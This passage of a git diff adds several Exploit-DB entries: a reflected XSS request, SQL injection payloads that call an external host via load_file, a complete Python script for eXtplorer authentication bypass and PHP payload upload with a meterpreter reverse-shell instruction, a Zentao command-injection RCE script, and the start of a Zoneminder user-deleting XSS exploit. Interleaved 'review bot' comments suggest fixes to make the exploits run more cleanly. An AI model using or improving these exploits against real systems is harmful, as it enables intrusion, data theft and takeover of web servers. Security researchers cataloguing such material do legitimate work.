+
+else
+
+    echo -e "${red}Not Vulnerable ${end}"
+    rm -f ./$target.out
+
+fi
+
+
+}
+
+vuln
\ No newline at end of file
diff --git a/exploits/php/webapps/51062.txt b/exploits/php/webapps/51062.txt
new file mode 100644
index 000000000..40c9bd339
--- /dev/null
+++ b/exploits/php/webapps/51062.txt
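Review bot: `#!/bin/bash` is on line 20, after the comment header, so `./poc.sh` as written in the Usage line is executed by the system's default `sh` rather than bash, and the `echo -e` and `$'...'` ANSI-C quoting used in `vuln` are bash-specific; the shebang belongs on line 1, or the header should say `bash poc.sh`. The vulnerable/not-vulnerable decision rests solely on `grep "results" ./$target.out`, which reports Vulnerable for any response body that happens to contain that word, including an error page, so the result should be read as indicative rather than conclusive. `$target.out` is unquoted in both the redirect and the `grep`, and that file holds whatever admin configuration the device returned, written into the current directory in clear; it should be quoted and handled as sensitive output. For defenders, the request shape on the curl line (`User-Agent: Node.js` together with a `Forwarded` header claiming `for="[127.0.0.1]..."`) is the artifact that detection rules for CVE-2022-40684 key on.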
@@ -0,0 +1,264 @@ +## Exploit Title: Canteen-Management v1.0 - XSS-Reflected +## Exploit Author: nu11secur1ty +## Date: 10.04.2022 +## Vendor: Free PHP Projects & Ideas with Source Codes for Students | +mayurik +## Software: +https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs +## Reference: +https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management + +## Description: +The name of an arbitrarily supplied URL parameter is copied into the value +of an HTML tag attribute which is encapsulated in double quotation marks. +The attacker can craft a very malicious HTTPS URL redirecting to a very +malicious URL. When the victim clicks into this crafted URL the game will +over for him. + +[+]Payload REQUEST: + +```HTML +GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22 +https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me +HTTP/1.1 +Host: pwnedhost.com +Accept-Encoding: gzip, deflate +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", +"Chromium";v="106" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 +``` + +[+]Payload RESPONSE: + +```burp +HTTP/1.1 200 OK +Date: Tue, 04 Oct 2022 09:44:55 GMT +Server: Apache/2.4.53 (Win64) 
OpenSSL/1.1.1n PHP/8.1.6 +X-Powered-By: PHP/8.1.6 +Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 6140 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + + + + + + + + + + + + + + + + + + + + + + + Youthappam Canteen Management System - by Mayuri K. +Freelancer + + + + + + + + + + + + + + + + + + + + + + +
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + +``` + +## Reproduce: +[href]( +https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management +) + +## Proof and Exploit: +[href](https://streamable.com/emg0zo) + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51063.txt b/exploits/php/webapps/51063.txt new file mode 100644 index 000000000..ee26883eb --- /dev/null +++ b/exploits/php/webapps/51063.txt 
@@ -0,0 +1,62 @@ +## Exploit Title: Canteen-Management v1.0 - SQL Injection +## Exploit Author: nu11secur1ty +## Date: 10.04.2022 +## Vendor: https://www.mayurik.com/ +## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi + +## Description: +The username parameter from Canteen-Management1.0-2022 appears to be +vulnerable to SQL injection attacks. +The malicious user can attack remotely this system by using this +vulnerability to steal all information from the database of this +system. + +STATUS: HIGH Vulnerability + +[+]Payload: + +```mysql +--- +Parameter: username (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: username=UvIiDwEB'+(select +load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' +OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: username=UvIiDwEB'+(select +load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' +AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND +'awEr'='awEr&password=h5F!l8j!Y6&login= +--- +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi) + +## Proof and Exploit: +[href](https://streamable.com/vvz2lh) + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at 
https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51067.txt b/exploits/php/webapps/51067.txt new file mode 100644 index 000000000..4fd75dd30 --- /dev/null +++ b/exploits/php/webapps/51067.txt 
@@ -0,0 +1,279 @@ +# Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) +# Exploit Author: ErPaciocco +# Author Website: https://erpaciocco.github.io +# Vendor Homepage: https://extplorer.net/ +# +# Vendor: +# ============== +# extplorer.net +# +# Product: +# ================== +# eXtplorer <= v2.1.14 +# +# eXtplorer is a PHP and Javascript-based File Manager, it allows to browse +# directories, edit, copy, move, delete, +# search, upload and download files, create & extract archives, create new +# files and directories, change file +# permissions (chmod) and more. It is often used as FTP extension for popular +# applications like Joomla. +# +# Vulnerability Type: +# ====================== +# Authentication Bypass (& Remote Command Execution) +# +# +# Vulnerability Details: +# ===================== +# +# eXtplorer authentication mechanism allows an attacker +# to login into the Admin Panel without knowing the password +# of the victim, but only its username. This vector is exploited +# by not supplying password in POST request. +# +# +# Tested on Windows +# +# +# Reproduction steps: +# ================== +# +# 1) Navigate to Login Panel +# 2) Intercept authentication POST request to /index.php +# 3) Remove 'password' field +# 4) Send it and enjoy! +# +# +# Exploit code(s): +# =============== +# +# Run below PY script from CLI... 
+# +# [eXtplorer_auth_bypass.py] +# + +# Proof Of Concept + +try: + import requests +except: + print(f"ERROR: RUN: pip install requests") + exit() +import sys +import time +import urllib.parse +import re +import random +import string +import socket +import time +import base64 + +TARGET = None +WORDLIST = None + +_BUILTIN_WL = [ + 'root', + 'admin', + 'test', + 'guest', + 'info', + 'adm', + 'user', + 'administrator' + ] + +_HOST = None +_PATH = None +_SESSION = None +_HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', + 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate, br', + 'Connection': 'keep-alive' } + +def detect(): + global _HOST + global _PATH + global _SESSION + global _HEADERS + + _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2] + _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/') + + + + _SESSION = requests.Session() + + raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False) + + if raw.status_code == 200: + ver = re.findall("(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE) + + if int(ver[0][2]) < 15: + return True + + return False + + +def auth_bypass(): + global _HOST + global _PATH + global _SESSION + global _HEADERS + + global WORDLIST + global _BUILTIN_WL + + _HEADERS['X-Requested-With'] = 'XMLHttpRequest' + + params = {'option': 'com_extplorer', + 'action': 'login', + 'type': 'extplorer', + 'username': 'admin', + 'lang':'english'} + + if WORDLIST != None: + if WORDLIST == _BUILTIN_WL: + info(f"Attempting to guess an username from builtin wordlist") + wl = _BUILTIN_WL + else: + info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}") + with open(WORDLIST[0], "r") as f: + wl = f.read().split('\n') + for user in wl: + params = {'option': 'com_extplorer', + 'action': 'login', + 'type': 
'extplorer', + 'username': user, + 'lang':'english'} + + info(f"Trying with {user}") + + res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) + if "successful" in res.text: + return (user) + else: + res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) + + if "successful" in res.text: + return ('admin') + + return False + +def rce(): + global _HOST + global _PATH + global _SESSION + global _HEADERS + global _PAYLOAD + + tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js") + token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0] + + info(f"CSRF Token obtained: {token}") + + payload = editPayload() + + info(f"Payload edited to fit local parameters") + + + params = {'option': 'com_extplorer', + 'action': 'upload', + 'dir': f"./{_PATH}", + 'requestType': 'xmlhttprequest', + 'confirm':'true', + 'token': token} + name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) + files = {'userfile[0]':(f"{name}.php", payload)} + + req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False) + + if "successful" in req.text: + info(f"File {name}.php uploaded in root dir") + info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php") + +def attack(): + if not TARGET: + error("TARGET needed") + + if TARGET: + if not detect(): + error("eXtplorer vulnerable instance not found!") + exit(1) + else: + info("eXtplorer endpoint is vulnerable!") + username = auth_bypass() + if username: + info("Auth bypassed!") + rce() + else: + error("Username 'admin' not found") + +def error(message): + print(f"[E] {message}") + +def info(message): + print(f"[I] {message}") + +def editPayload(): + # You can generate payload with msfvenom and paste below base64 encoded result + # msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f base64 + return 
base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==") + +def help(): + print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution + +Usage: + python3 eXtplorer_auth_bypass.py -t [-w ] [-wb] + +Options: + -t Target host. Provide target IP address (and optionally port). + -w Wordlist for user enumeration and authentication (Optional) + -wb Use built-in wordlist for user enumeration (Optional) + -h Show this help menu. +""") + return True + +args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))), + "w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))), + "wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))), + "h" : (0, lambda *x: (help() and exit(0)))} + +if __name__ == "__main__": + i = 1 + [ + args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ]) + for arg in [k + for k in sys.argv[i:] + ] + if arg[0] == '-' + ] + attack() +else: + help() + + +# /////////////////////////////////////////////////////////////////////// + +# [Script examples] +# +# +# c:\>python eXtplorer_auth_bypass.py -t https://target.com +# c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt +# c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb + +# Exploitation Method: +# ====================== +# Remote + +# [+] Disclaimer +# The information contained within this advisory is supplied "as-is" with no +# warranties or guarantees of fitness of use or otherwise. +# Permission is hereby granted for the redistribution of this advisory, +# provided that it is not altered except by reformatting it, and +# that due credit is given. Permission is explicitly given for insertion in +# vulnerability databases and similar, provided that due credit +# is given to the author. The author is not responsible for any misuse of the +# information contained herein and accepts no responsibility +# for any damage caused by the use or misuse of this information. \ No newline at end of file 
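Review bot: The import guard at the top of the embedded script uses a bare `except:`, which also swallows `KeyboardInterrupt` and `SystemExit` and hides any failure other than a missing module; narrow it to `except ImportError:`. `time` is imported twice, `help()` shadows the builtin of the same name, and `rce()` declares `global _PAYLOAD` for a name the module never defines — harmless individually, but together they make the file read as unfinished. The hand-rolled `sys.argv` walk in the `__main__` block (a list comprehension with a walrus used purely for side effects) raises a bare `KeyError` on any unrecognised option and an `IndexError` when `-t` is given without a value; `argparse` would express the same options in fewer lines with proper usage errors, and the `if __name__ == "__main__"` block should not be the place where the parsing logic lives.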
diff --git a/exploits/php/webapps/51068.txt b/exploits/php/webapps/51068.txt
new file mode 100644
index 000000000..1bf052614
--- /dev/null
+++ b/exploits/php/webapps/51068.txt
@@ -0,0 +1,14 @@
+# Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting
+# Date: 2020-09-24
+# Exploit Author: Sinem Şahin
+# Vendor Homepage: https://flatcore.org/
+# Version: 2.1.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Go to the following url. => http://(HOST)/install/index.php
+2- Write XSS Payload into the username of the user account.
+3- Press "Save" button.
+
+XSS Payload ==> "
\ No newline at end of file
diff --git a/exploits/php/webapps/51069.txt b/exploits/php/webapps/51069.txt
new file mode 100644
index 000000000..0821c1403
--- /dev/null
+++ b/exploits/php/webapps/51069.txt
@@ -0,0 +1,110 @@ +# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) +# Exploit Author: mister0xf +# Date: 2022-10-8 +# Software Link: https://github.com/easysoft/zentaopms +# Version: tested on 17.0 (probably works also on newer/older versions) +# Tested On: Kali Linux 2022.2 +# Exploit Tested Using: Python 3.10.4 +# Vulnerability Description: +# Zentao Project Management System 17.0 suffers from an authenticated command injection allowing +# remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver + +# Vulnerable Source Code: +# /module/repo/model.php: +# [...] +# $client = $this->post->client; // <-- client is taken from the POST request +# [...] +# elseif($scm == 'Git') +# { +# if(!is_dir($path)) +# { +# dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path); +# return false; +# } +# +# if(!chdir($path)) +# { +# if(!is_executable($path)) +# { +# dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path); +# return false; +# } +# dao::$errors['path'] = $this->lang->repo->error->path; +# return false; +# } +# +# $command = "$client tag 2>&1"; // <-- command is injected here +# exec($command, $output, $result); + +import requests,sys +import hashlib +from urllib.parse import urlparse +from bs4 import BeautifulSoup + +def banner(): + print(''' + ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: + :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: + +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ + +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ + +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ + #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# +######### ########## ### #### ######## ########### ### ### ######## + ''') +def usage(): + print('Usage: zenciao user password http://127.0.0.1/path') + +def main(): + + if ((len(sys.argv)-1) != 3): + usage() + banner() + exit() + + #proxy = {'http':'http://127.0.0.1:8080'} + + banner() + username = sys.argv[1] + password = 
sys.argv[2] + target = sys.argv[3] + + # initialize session object + session = requests.session() + + home_url = target+'/index.php' + rand_url = target+'/index.php?m=user&f=refreshRandom&t=html' + login_url = target+'/index.php?m=user&f=login&t=html' + create_repo_url = target+'/index.php?m=repo&f=create&objectID=0' + + r1 = session.get(home_url) + soup = BeautifulSoup(r1.text, "html.parser") + script_tag = soup.find('script') + redirect_url = script_tag.string.split("'")[1] + r2 = session.get(target+redirect_url) + + # get random value + session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) + res = session.get(rand_url) + rand = res.text + + # compute md5(md5(password)+rand) + md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode()) + + # login request + post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""} + my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html' + session.headers.update({'Referer': my_referer}) + session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) + response = session.post(login_url, data=post_data) + + # exploit rce + # devops repo page + r2 = session.get(create_repo_url) + git_test_dir = '/home/' + command = 'whoami;' + exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""} + r3 = session.post(create_repo_url, data=exploit_post_data) + print(r3.content) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/51070.txt b/exploits/php/webapps/51070.txt new file mode 100644 index 000000000..a7ed4540c --- /dev/null +++ b/exploits/php/webapps/51070.txt 
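Review bot: The script depends on two third-party packages, `requests` and `bs4` (BeautifulSoup), but the header only records the Python version it was tested with; add `# Requires: requests, beautifulsoup4` next to `# Exploit Tested Using:` so the dependency is visible before the import fails. In `main()`, `r2` is bound twice and `response` from the login POST is assigned but never inspected, so the code reads as if those results mattered when nothing looks at them; drop the unused bindings or leave a one-line comment saying why the responses are deliberately ignored. The commented-out `#proxy = {...}` line is dead code and should be removed rather than kept as a toggle, and `script_tag.string.split("'")[1]` will raise `AttributeError` rather than a readable error when the home page has no `<script>` element.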
@@ -0,0 +1,16 @@
+# Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)
+# Exploit Author: Sinem Şahin
+# Date: 2022-10-08
+# Vendor Homepage: https://www.csphere.eu/
+# Version: 2011.4
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872
+2- Write XSS Payload into the username of the buddy list create.
+3- Press "Save" button.
+
+XSS Payload ==> "
+
+Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md
\ No newline at end of file
diff --git a/exploits/php/webapps/51071.py b/exploits/php/webapps/51071.py
new file mode 100755
index 000000000..7df15e0e5
--- /dev/null
+++ b/exploits/php/webapps/51071.py
@@ -0,0 +1,70 @@ +# Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS) +# Date: 10/01/2022 +# Exploit Author: Trenches of IT +# Vendor Homepage: https://github.com/ZoneMinder/zoneminder +# Version: v1.36.26 +# Tested on: Linux/Windows +# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 +# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/ +# +# Proof of Concept: +# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped) +# 2 - Admin user logs navigates to http:///zm/index.php?view=log +# 3 - XSS executes delete function on target UID (user). + +import requests +import re +import time +import argparse +import sys + +def getOptions(args=sys.argv[1:]): + parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") + parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) + parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) + parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) + parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) + parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) + options = parser.parse_args(args) + return options + +options = getOptions(sys.argv[1:]) + +payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F +